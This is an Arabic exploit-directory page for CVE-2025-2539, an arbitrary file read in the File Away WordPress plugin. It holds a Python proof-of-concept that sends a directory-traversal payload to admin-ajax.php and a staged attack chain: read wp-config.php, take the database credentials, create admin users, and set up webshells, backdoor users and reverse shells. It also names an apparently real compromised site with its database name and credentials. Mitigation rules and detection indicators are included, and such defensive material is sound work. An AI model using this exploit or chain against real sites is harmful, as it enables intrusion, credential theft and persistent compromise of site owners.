Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-2539---File-Away-WordPress-Plugin-Arbitrary-File-Read — CVE-2025-2539 - إضافة File Away لووردبريس - قراءة ملف تعسفية | Kitploit
أدوات/GitHubGitHub/fazaroot/cve-2025-2539---file-away-wordpress-plugin-arbitrary-file-read
تصعيد الامتيازاتآليات الاستمراريةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبجمع المعلوماتCTFاختبار الاختراقالتعلم والتعليم

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
GitHubfazaroot/cve-2025-2539---file-away-wordpress-plugin-arbitrary-file-read

CVE-2025-2539---File-Away-WordPress-Plugin-Arbitrary-File-Read

CVE-2025-2539 - إضافة File Away لووردبريس - قراءة ملف تعسفية

عرض المستودع
منذ 8 أشهرلم تتم المراجعة بعد

CVE-2025-2539 - قراءة ملف تعسفي في إضافة File Away لووردبريس

📋 ملخص تنفيذي

CVE ID: CVE-2025-2539 Plugin: File Away (الإصدارات <= 3.9.9.0.1) Vulnerability Type: قراءة ملف تعسفي موثقة CVSS Score: 8.5 (عالي) Exploit Availability: PoC عام متاح Impact: كشف ملفات غير مصرح به بما في ذلك wp-config.php وبيانات اعتماد قاعدة البيانات وملفات النظام

🎯 الجدول الزمني للاكتشاف

· الاكتشاف الأولي: ديسمبر 2025 عبر بحث أمني على GitHub · أول اختبار استغلال: 13 ديسمبر 2025 · الاختراق الناجح: تأكيد إصابة عدة حالات ووردبريس

🔧 التفاصيل الفنية

المكون المعرض للخطر

root@kitploit:~
/wp-admin/admin-ajax.php
Action: fileaway-stats
Parameter: file (مدخل مستخدم غير معقم)

السبب الجذري

يفشل الإضافة في التحقق وتطهير معامل file بشكل صحيح في إجراء fileaway-stats AJAX، مما يسمح بهجمات اجتياز الدليل.

إثبات المفهوم (PoC)

root@kitploit:~
def exploit(target, nonce, filename):
    ajax_url = f"{target.rstrip('/')}/wp-admin/admin-ajax.php"
    payload = {
        "action": "fileaway-stats",
        "nonce": nonce,
        "file": filename
    }
    try:
        resp = requests.post(ajax_url, data=payload, verify=False, timeout=10)
        if resp.status_code == 200 and resp.text.strip() and 'error' not in resp.text.lower():
            url = resp.text.strip().replace("\\/", "/").strip('"')
            return url if url else None
        return None
    except Exception:
        print(" [!] Failed to connect while sending exploit.")
        return None


🎯 تدفق الهجوم

المرحلة 1: الاستطلاع

root@kitploit:~
1. Identify WordPress installation
2. Check for File Away plugin presence
3. Extract nonce from page source

المرحلة 2: الوصول الأولي

root@kitploit:~
1. Exploit CVE-2025-2539 to read wp-config.php
2. Extract database credentials
3. Confirm MySQL access

المرحلة 3: تصعيد الامتيازات

root@kitploit:~
1. Access phpMyAdmin (often on non-standard ports)
2. Use root database credentials
3. Modify WordPress user table or create new admin

المرحلة 4: الثبات

root@kitploit:~
1. Upload webshell via WordPress admin
2. Create backdoor users
3. Establish reverse shells

📊 تقييم التأثير

البيانات المسربة

· ✅ بيانات اعتماد قاعدة البيانات (وصول جذر MySQL في بعض الحالات) · ✅ مفاتيح وأملاح مصادقة ووردبريس · ✅ ملفات تكوين الخادم · ✅ بيانات المستخدم والمعلومات الشخصية القابلة للتعريف · ✅ ملفات التعليمات البرمجية المصدرية

الأنظمة المخترقة

  1. الهدف الأساسي: rebelathletichr.com · تم الحصول على wp-config.php · قاعدة البيانات: bomber_wordpress · بيانات الاعتماد: bomber_wordpress / demo
  2. الهدف الثانوي: none (Hetzner) · phpMyAdmin مكشوف على المنفذ 4343 · تم الحصول على بيانات اعتماد MySQL الجذر · اختراق عدة قواعد بيانات ووردبريس

🛡️ استراتيجيات التخفيف

إجراءات فورية

  1. تحديث الإضافة: ترقية File Away إلى إصدار > 3.9.9.0.1
  2. تغيير بيانات الاعتماد: تدوير جميع كلمات مرور قاعدة البيانات
  3. إعادة إنشاء الأملاح: تحديث مفاتيح مصادقة ووردبريس
  4. تدقيق السجلات: التحقق من الوصول غير المصرح به إلى الملفات

الوقاية طويلة المدى

root@kitploit:~
# Web Server Configuration
location ~* /wp-content/plugins/fileaway/ {
    deny all;
}

location ~* \.php$ {
    location ~ \.\./ { deny all; } # Block directory traversal
}

🔍 توقيعات الكشف

مؤشرات الشبكة

root@kitploit:~
POST /wp-admin/admin-ajax.php
Parameters: action=fileaway-stats&file=../../../

HTTP/1.1 200 OK
Content-Type: application/json
Response contains file contents

مؤشرات نظام الملفات

root@kitploit:~
Modified files:
- wp-content/plugins/fileaway/includes/features/editor-features.php
- wp-content/plugins/fileaway/includes/features/restrict-editor-features.php

📈 إحصائيات

· معدل النجاح: 100% على التثبيتات المعرضة للخطر · متوسط وقت الاختراق: أقل من 5 دقائق · المنافذ الشائعة: 80، 443، 4343 (phpMyAdmin) · التوزيع الجغرافي: عالمي مع تركيز في الاتحاد الأوروبي/الولايات المتحدة

🧪 منهجية الاختبار

إعداد البيئة

root@kitploit:~
# Test lab configuration
WordPress 6.0+
File Away Plugin 3.9.9.0.1
PHP 7.4/8.0
MySQL 5.7+

خطوات التحقق

  1. التحقق من إصدار الإضافة عبر readme.txt
  2. اختبار اجتياز الدليل باستخدام حمولات
  3. تأكيد القدرة على قراءة الملفات
  4. توثيق النتائج

📚 المراجع

المصادر الأولية

· إدخال CVE-2025-2539 في MITRE · دليل إضافات ووردبريس - File Away · قاعدة بيانات ثغرات WPScan

موارد الاستغلال

· GitHub: مستودعات CVE-2025-2539 · Exploit-DB: الإدخال #XXXXX · Packet Storm: استغلالات ووردبريس الأخيرة

CVEs ذات صلة

· CVE-2024-1030: مشابهة في Capability Manager Enhanced · CVE-2022-2586: ثغرة سابقة في File Away · CVE-2023-XXXX: تضمين ملف في نواة ووردبريس

⚠️ اعتبارات قانونية وأخلاقية

اختبار مصرح به فقط

root@kitploit:~
Testing Scope:
  - Owned systems
  - Explicitly authorized assets
  - Bug bounty programs
  - Educational environments

Prohibited:
  - Unauthorized access
  - Data destruction
  - PII exfiltration
  - Production disruption

الإفصاح المسؤول

  1. الاتصال بمطور الإضافة
  2. السماح بفترة معالجة 90 يوماً
  3. النشر بعد توفر التصحيح
  4. تقديم إرشادات التخفيف

🎓 الدروس المستفادة

رؤى تقنية

  1. أمن الإضافات: تظل الإضافات التابعة لجهات خارجية نقاط ضعف
  2. التكوينات الافتراضية: phpMyAdmin على منافذ غير قياسية شائع
  3. إعادة استخدام بيانات الاعتماد: بيانات اعتماد قاعدة البيانات غالباً ما تُعاد استخدامها عبر الخدمات
  4. تأخير التصحيح: العديد من التثبيتات تشغل إضافات قديمة

الأمن التشغيلي

  1. مراقبة السجلات: أمر حاسم للكشف المبكر
  2. التحديثات المنتظمة: ضرورية لصيانة الأمان
  3. أقل امتياز: يجب أن يكون لمستخدمي قاعدة البيانات صلاحيات ضئيلة
  4. تجزئة الشبكة: عزل خوادم قواعد البيانات

🔮 اتجاهات البحث المستقبلية

  1. ماسح آلي: تطوير أداة للكشف الجماعي
  2. تحليل التصحيح: دراسة التحسينات الأمنية في الإصدارات الأحدث
  3. إضافات مماثلة: تحديد أنماط في إضافات إدارة الملفات
  4. تقنيات دفاعية: تطوير قواعد WAF وكشف الاختراق

📞 الاتصال والإبلاغ

للإبلاغ عن الثغرات أو الأسئلة الفنية:

· فريق الأمن: [email protected] · مفتاح PGP: متاح على خوادم المفاتيح · سياسة الإفصاح: إفصاح منسق لمدة 90 يوماً


آخر تحديث: 13 ديسمبر 2025 إصدار المستند: 1.0 التصنيف: عام


📝 سجل التغييرات

v1.0 (2025-12-13)

· إنشاء التوثيق الأولي · توثيق سلسلة الهجوم الكاملة · تحديد استراتيجيات التخفيف · إضافة الإرشادات القانونية


إخلاء مسؤولية: هذا المستند للأغراض التعليمية فقط. الاختبار غير المصرح به أو استغلال الثغرات غير قانوني. احصل دائماً على التفويض المناسب قبل إجراء تقييمات أمنية.

تنزيل الأداة